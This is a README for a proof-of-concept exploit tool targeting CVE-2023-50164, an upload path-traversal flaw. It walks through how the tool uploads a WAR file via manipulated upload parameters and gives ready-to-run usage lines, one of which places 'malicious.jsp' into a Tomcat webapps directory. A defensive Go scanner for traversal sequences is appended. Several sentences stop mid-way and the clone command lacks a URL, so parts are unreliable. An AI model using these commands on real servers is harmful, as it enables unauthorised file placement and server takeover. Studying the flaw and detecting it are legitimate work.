PoC for CVE-2023-50164


  To install this tool, you need Go 1.20 or later installed and configured.

  $ go install

  Alternatively, you can build it yourself:
  $ git clone cve-2023-50164-poc/
  $ cd $_
  $ go build .

How it Works?

  This tool operates through a series of stages to execute the exploit.
  For instance, if you want to upload the file `/path/to/file-you-want-to-upload.txt`, the tool proceeds as follows:

  1. It compresses the specified file into a WAR file, generating a `file-you-want-to-upload.war` in the
     OS-specific temporary directory. Thus, the tool assumes that the servlet context file path is

  2. It checks whether the servlet context file path already exists. If it does, the tool immediately returns an

  3. The tool attempts to upload the WAR file by manipulating file upload parameters.

  4. Subsequently, it double-checks the availability (status code 200) of the servlet context file path,
     indicating successful file upload.


    $ cve-2023-50164-poc -h

      PoC for CVE-2023-50164
      coded by @dwisiswant0

      cve-2023-50164-poc -u <URL> -f <FILE> -p <PATH>

      -u, --url <URL>             Specify the upload endpoint URL
      -f, --file <FILE>           Provide the payload file for uploading
      -t, --traverse-seq <N>      Generate traversal sequences N times (default: "0")
      -p, --path <PATH>           Specify the path to the accessible root directory
      -w, -win, --windows         Converts slash ("/") chars to Windows separator ("\")

      cve-2023-50164-poc -u http://host/path/to/upload.action -f foo.txt -t 1 -p webapps
      cve-2023-50164-poc -u http://host/upload/upload.action -f malicious.jsp -t 2 -p /opt/tomcat/webapps


  1. The `jar` binary must be present in your system's $PATH.
  2. The target path should be an accessible root path, such as `/var/lib/jetty/webapps` for Jetty or
     `/opt/tomcat/webapps` for Apache Tomcat.
  3. The default number of traversal sequences is zero ("0"). You can enter traversal sequences manually in
     the `-p`/`--path` flag value, e.g. `/../webapps` or `/../../opt/tomcat/webapps`. The traversal sequences
     will differ for each servlet.
  4. The `-w`/`-win`/`--windows` flag is used only when the servlet runs on a Windows server.
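
  For defenders, the traversal sequences described in notes 3 and 4 can be spotted in upload traffic. The
  following Go sketch is an added example, not part of this tool: it scans a multipart/form-data body for
  `..` segments with either separator. The field name `saveAs` and the sample body are constructed.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"mime"
	"mime/multipart"
	"net/url"
	"strings"
)

// hasTraversal: true if v has a ".." segment split on "/" or "\", as sent or URL-decoded once.
func hasTraversal(v string) bool {
	if d, err := url.PathUnescape(v); err == nil {
		v += "/" + d
	}
	for _, seg := range strings.FieldsFunc(v, func(r rune) bool { return r == '/' || r == '\\' }) {
		if seg == ".." {
			return true
		}
	}
	return false
}

// ScanUpload lists multipart parts whose raw filename or field value carries a traversal sequence.
func ScanUpload(body []byte, boundary string) (hits []string) {
	mr := multipart.NewReader(bytes.NewReader(body), boundary)
	for p, err := mr.NextPart(); err == nil; p, err = mr.NextPart() {
		// Part.FileName() keeps only the base name, so parse the raw header.
		_, params, _ := mime.ParseMediaType(p.Header.Get("Content-Disposition"))
		val, isFile := params["filename"]
		if !isFile { // plain field: inspect its (short) value instead
			b, _ := io.ReadAll(io.LimitReader(p, 4096))
			val = string(b)
		}
		if hasTraversal(val) {
			hits = append(hits, fmt.Sprintf("%s=%q", params["name"], val))
		}
	}
	return hits
}

func main() {
	// Constructed request body: one clean file part, one field with "..\" segments.
	body := "--b\r\nContent-Disposition: form-data; name=\"file\"; filename=\"a.txt\"\r\n\r\nhi\r\n" +
		"--b\r\nContent-Disposition: form-data; name=\"saveAs\"\r\n\r\n..\\..\\a.txt\r\n--b--\r\n"
	fmt.Println(ScanUpload([]byte(body), "b"))
}
```

  The scan stops at the first malformed part, so a production check should treat a parse error as a
  finding in its own right.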


  Using this tool to attack targets without mutual consent is illegal. Users must follow local, state, and
  federal laws. The developer ("dwisiswant0"/"Dwi Siswanto") is NOT responsible for any damage caused by
  misuse of the tool.


  This tool is licensed under WTFPL v2 (DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE). See COPYING.